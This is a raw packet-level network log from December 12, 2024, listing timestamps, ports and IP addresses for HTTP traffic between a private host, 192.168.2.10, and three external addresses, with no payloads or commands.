Dec 12, 2024 16:48:39.990772963 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.991869926 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.991915941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.991971970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.992969036 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.993078947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.993232965 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.994131088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.994215965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.994261980 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.995121956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.995271921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.995342016 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.996237993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.996747017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.996793985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.997164011 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.997198105 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.997266054 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.998368025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.998388052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.998451948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:40.865557909 CET	80	49943	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:40.865616083 CET	80	49943	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:40.865674973 CET	49943	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:40.867331982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:40.869188070 CET	49943	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:40.987003088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:40.987087011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:40.987169027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:40.988996029 CET	80	49943	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:41.106852055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.310847998 CET	49926	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:42.311140060 CET	49951	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:42.321104050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321244001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321382046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.321408987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321463108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321472883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321508884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.321646929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321660042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321670055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321676016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.321701050 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.321764946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.323743105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.430906057 CET	80	49951	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:42.431020975 CET	49951	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:42.431042910 CET	80	49926	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:42.431197882 CET	49926	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:42.432971954 CET	49951	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:42.441193104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.441271067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.441416979 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.445388079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.494060040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.513633966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.513745070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.515727043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.517878056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.518006086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.518208027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.526449919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.529294968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.529419899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.529652119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.537744045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.537760973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.537877083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.546118021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.546200991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.546201944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.552755117 CET	80	49951	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:42.554563046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.554658890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.554670095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.562921047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.562990904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.563009977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.571291924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.571342945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.571378946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.579679012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.579754114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.579772949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.588099957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.588112116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.588260889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.614293098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.614434004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.706041098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.706183910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.706727028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.707458973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.707537889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.707704067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.712791920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.712805986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.712929010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.717660904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.717839956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.718103886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.722800016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.722960949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.723084927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.727500916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.727611065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.727724075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.732394934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.732538939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.732672930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.737054110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.737067938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.737330914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.741520882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.741611004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.741837978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.746248960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.746330023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.746543884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.750952005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.751220942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.751389027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.756036043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.756206989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.756402969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.760569096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.760617971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.760731936 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.764956951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.765000105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.765240908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.769548893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.769726038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.769855022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.774163008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.774344921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.774574041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.778896093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.779059887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.779181957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.783582926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.783633947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.783749104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.788163900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.837852001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.898665905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.898829937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.899046898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.900373936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.900558949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.900693893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.903805017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.903985977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.904123068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.907324076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.907411098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.907716990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.910746098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.910798073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.910917044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.914062977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.914170027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.914330006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.917366028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.917598009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.919734001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.920627117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.920737982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.923115969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.923927069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.924088001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.924217939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.927238941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.927305937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.927423000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.930493116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.930711031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.930814028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.933856010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.933999062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.934122086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.937117100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.937203884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.937336922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.940431118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.940499067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.941761017 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.943674088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.943766117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.944350958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.946952105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.947084904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.947309971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.950241089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.950362921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.950457096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.953552961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.953666925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.953810930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.956854105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.956994057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.957139015 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.960180044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.960278034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.960422039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.963517904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.963592052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.963727951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.966763973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.966886997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.967395067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.970199108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.970382929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.971692085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.973335028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.973432064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.973542929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.976691008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.976773977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.977317095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.979948044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.980108976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.983247995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.983280897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.983423948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.983423948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.986552954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.986588955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.986733913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.989856958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.989970922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.990107059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:42.993103027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.993128061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:42.993271112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.090858936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.090935946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.091125011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.092338085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.092379093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.092504978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.095077991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.095141888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.095284939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.097734928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.097795010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.097914934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.100594997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.100694895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.100831985 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.103883028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.104024887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.104403019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.106050968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.106188059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.106309891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.108675957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.108767033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.109093904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.111207008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.111294031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.111411095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.113725901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.113801003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.113929033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.116204023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.116285086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.116425991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.118627071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.118648052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.118786097 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.121040106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.121140957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.121274948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.123425007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.123485088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.123625040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.125799894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.125844002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.125987053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.128160954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.128262997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.128393888 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.130548954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.130712986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.130870104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.132929087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.133049965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.133183956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.135394096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.135421991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.135559082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.137737989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.137768030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.137901068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.140120983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.140218019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.140342951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.142503023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.142601013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.142718077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.144870043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.144995928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.145757914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.147263050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.147353888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.147455931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.149661064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.149775028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.150007963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.152297974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.152338028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.152467966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.154448986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.154612064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.155780077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.156903982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.156939983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.157020092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.159296989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.159390926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.159502029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.161614895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.161712885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.161844969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.164011955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.164108038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.164230108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.166368008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.166428089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.167742014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.168812990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.168922901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.171211004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.171266079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.171356916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.171372890 CET	49946	80	192.168.2.10	185.81.68.147
